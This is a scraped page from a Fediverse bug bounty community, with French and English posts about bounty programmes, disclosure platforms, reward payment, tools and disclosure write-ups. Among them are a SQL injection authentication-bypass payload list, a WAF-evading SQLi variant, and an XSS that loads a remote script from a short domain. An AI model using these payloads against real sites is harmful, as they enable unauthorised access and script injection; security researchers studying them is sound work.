Bug Bounty Hunters Community

paheko, French
@paheko@piaille.fr avatar

Nous ouvrons notre programme de bug bounty pour #paheko !

Cela veut dire que si vous cherchez et trouvez des failles de sécurité dans Paheko, on peut vous récompenser. Le montant de la récompense sera fait en fonction de la sévérité de la faille. On a débloqué 1000 € pour le moment, montant amené à évoluer en fonction des retours que nous recevrons.

Un audit de sécurité partiel aura aussi lieu dans les mois qui viennent.

Pour les détails sur le bug bounty, voir ici : https://fossil.kd2.org/paheko/doc/trunk/SECURITY.md

#bugbounty #cybersecurity

bohwaz, French
@bohwaz@mamot.fr avatar

Hello les gens et les #chatons, des gens qui ont déjà mis en place un programme de #bugbounty pour un projet open source ?

La plupart des sites de bug bounty semblent conçus pour les grosses boîtes.

cyber_learning, French
@cyber_learning@piaille.fr avatar

Avons nous, en France et en français, une plate-forme éthique de divulgation de faille cyber à but non lucratif ?
Type openbugbounty ?
Si oui, laquelle ?

Le boost corrige les failles xss

#cyber #bugbounty #informatique

cyber_learning,
@cyber_learning@piaille.fr avatar

@shalien 👍en effet, l'ansii propose le service. La cnil non (seulement des déclarations de perte/violation de données.)

Merci

shalien,
@shalien@projetretro.io avatar

@cyber_learning Désolé c'était de tête, j'aurais dû creuser

ChickenPwny,

#bugbounty #tooling =D it takes all the nuclei output makes it pretty now.

checkout my tool https://github.com/PolitoInc/EGOAlpha

#hacking #redteam @jerry behold the tool i made xD

jerry,

@ChickenPwny very nice!

rwxrwx,

@protonmail you paid $750 for a mail-based XSS? this is disappointing for a "service that respects privacy and puts people [...] first". https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/ #bugbounty #protonmail

protonmail,
@protonmail@mastodon.social avatar

@rwxrwx The issue was fixed in early July 2022. The non-web Proton Mail apps were never affected. At the time the issue was reported, we also conducted a thorough analysis of our available spam and virus filter logs and found no evidence of this attack in the wild except for the proof-of-concept reported to us. This is consistent with the attack's difficulty and the unlikely series of user actions required to make it work.

vito,

I had a field that allows html but the length is limited to 40 server side so I couldn't do much. So I registered the domain https://XXX.cc and could load a remote script from <script src=//https://xxx.cc></script> which fits in 30, and got it working nicely. #bugbounty

vito,

@CenturyAvocado wow 5 letters. I tried to find one but they all seem gone now :)

CenturyAvocado,
@CenturyAvocado@fosstodon.org avatar

@vito "0r.lc" and some other permutations appear to still be available ;)

lirantal,

ooh wow, imagemagick is the gift that keeps on giving RCE and command injection 🫣

check out this beauty of a poc
#bugbounty #infosec #cybersecurity

thijs,

So somebody has reported an issue through your responsible disclosure program.

If the report is eligible for a reward, what is the preferred way of transerring the money? Is that i.e. PayPal or a different platform?

#askingforafriend #responsbiledisclosure #bugbounty

ChickenPwny,

@kkarhan @thijs you can use almost any option really some people pay in econ, you can wire the money to your account, PayPal venmo

ChickenPwny,

@kkarhan @thijs typically we can trust companies with bank stuff. It's not like they could find you if they wanted if you commited crimes. It's also good for your branding as a hacker.

oggy, French

FranceConnect #bugbounty for #hackers but not for #cybercriminals

https://yeswehack.com/programs/franceconnect-agentconnect-public

#cybersecurity #infosec

ChickenPwny,

#bugbounty leaderboard

sergeant,
@sergeant@qoto.org avatar

@ChickenPwny Gay Pride?

insiderphd,

If you've seen the updated OWASP API Top 10 you may be a bit confused by the "Authorisation" vulnerabilities - aren't they all just explaining the same thing? Here's a breakdown of the 4 access control issues you common see in APIs 👇👇
https://www.craft.me/s/CysIiph247P5AQ
#bugbountytips #BugBounty

_ut0p1c,

@insiderphd Thanks for sharing! Last time I checked, I think it was earlier this year, OWASP was last updated in 2021is this new info?

0x58,

#bugbounty hunters - Get dressed accordingly! 🐛

#geekhumor #geek #clothing

https://www.etsy.com/listing/1543178070/the-unstoppable-bug-bounty-hunter-t

sanjaymenon,
@sanjaymenon@mastodon.social avatar

Disposable-mailbox Docker

A self hosted yopmail like server running in a docker

https://github.com/Orange-Cyberdefense/disposable-mailbox-docker

#bugbounty #hacking #infosec #security

hdm,

@sanjaymenon got to love that commit message:

"removed stuff"

sanjaymenon,
@sanjaymenon@mastodon.social avatar

@hdm 😂

sanjaymenon,
@sanjaymenon@mastodon.social avatar

The WebP 0day

https://blog.isosceles.com/the-webp-0day

#bugbounty #hacking #infosec

tdp_org,
@tdp_org@mastodon.social avatar

Someone just reported that a link from our Bug Bounty Hall of Fame page goes to an unregistered profile - i.e. link destination takeover.

Beautiful. Well played. The circle is complete.

#BugBounty #InfoSec

Cyberkid1987, Greek

🪲 nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications that could lead to full account takeovers

https://m.youtube.com/watch?v=ceeA3FmKxtM

by @descopeinc

#bugbounty #cybersecurity #Azure

image/jpeg

nikahverse,

SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

#sqli #bugbounty #security #infosec

revk,
@revk@toot.me.uk avatar

@nikahverse last on is cunning…

Rairii,
@Rairii@haqueers.com avatar

@nikahverse for mysql and derivatives I always liked '||1-- - which tended to bypass a lot of WAFs

Edent,
@Edent@mastodon.social avatar

Found a tasty little in a new service.
Have performed a - but I doubt they offer a .

SHA1 of the domain: 158281f1ff672afa1159fcb6788aa6825dbb0773

Edent,
@Edent@mastodon.social avatar

For those playing along at home, the answer was....

codeberg.page

https://shkspr.mobi/blog/2023/01/responsible-disclosure-xss-in-codeberg-pages/

#XSS

Edent,
@Edent@mastodon.social avatar

Responsible Disclosure: Chrome security bug let tabs draw over each other ($1k bounty)

Chrome for Android had a flaw which let one tab draw over another - even if the tabs were on completely different domains. A determined attacker might have been able to abuse this to convince a user to download and installed a

https://shkspr.mobi/blog/2021/12/responsible-disclosure-chrome-security-bug-lets-tabs-draw-over-each-other/

#/etc/ #bug #bugbounty #google #responsibledisclosure #security

Edent,
@Edent@mastodon.social avatar

Full Disclosure: XSS in Getty Images

I've spent two months trying to report this issue to Getty images. They haven't responded to my emails, phone calls, Tweets, or LinkedIn messages. I've tried escalating through OpenBugBounty and HackerOne - but still no response. I've taken the decision to fully disclose this XSS because the Getty Images sites accept pa

https://shkspr.mobi/blog/2021/08/full-disclosure-xss-in-getty-images/

#/etc/ #bugbounty #responsibledisclosure #security #xss

Edent,
@Edent@mastodon.social avatar

Responsible Disclosure - John Lewis

https://shkspr.mobi/blog/2020/02/responsible-disclosure-john-lewis/

Edent,
@Edent@mastodon.social avatar

Even Google forgets to renew its domains

https://shkspr.mobi/blog/2020/01/even-google-forgets-to-renew-its-domains/

#bugbounty #dns #google #responsibledisclosure #security

sanjaymenon,
@sanjaymenon@mastodon.social avatar

https://shreyaschavhan.notion.site/Roadmap-I-followed-to-make-15-000-Bounties-in-my-first-8-months-of-starting-out-and-my-journey-98b1b9ff621645c0b97d1e774992f300

#bugbounty #hackerone #infosec

sanjaymenon,
@sanjaymenon@mastodon.social avatar

https://fork-glass-a4c.notion.site/H1-Report-Notes-Shreyas-Chavhan-Shared-c2c9e990d2474d288626da2604bd4498

#bugbounty #hackerone #infosec

sanjaymenon,
@sanjaymenon@mastodon.social avatar

A compiled list of companies which accept responsible disclosure

https://bug-bounties.as93.net

#bugbounty #cybersecurity #infosec

  • All
  • Subscribed
  • Moderated
  • Favorites
  • BugBounty
  • kavyap
  • thenastyranch
  • ethstaker
  • DreamBathrooms
  • osvaldo12
  • magazineikmin
  • tacticalgear
  • Youngstown
  • everett
  • mdbf
  • slotface
  • ngwrru68w68
  • rosin
  • Durango
  • JUstTest
  • InstantRegret
  • GTA5RPClips
  • tester
  • cubers
  • cisconetworking
  • normalnudes
  • khanakhh
  • modclub
  • anitta
  • Leos
  • megavids
  • provamag3
  • lostlight
  • All magazines
    •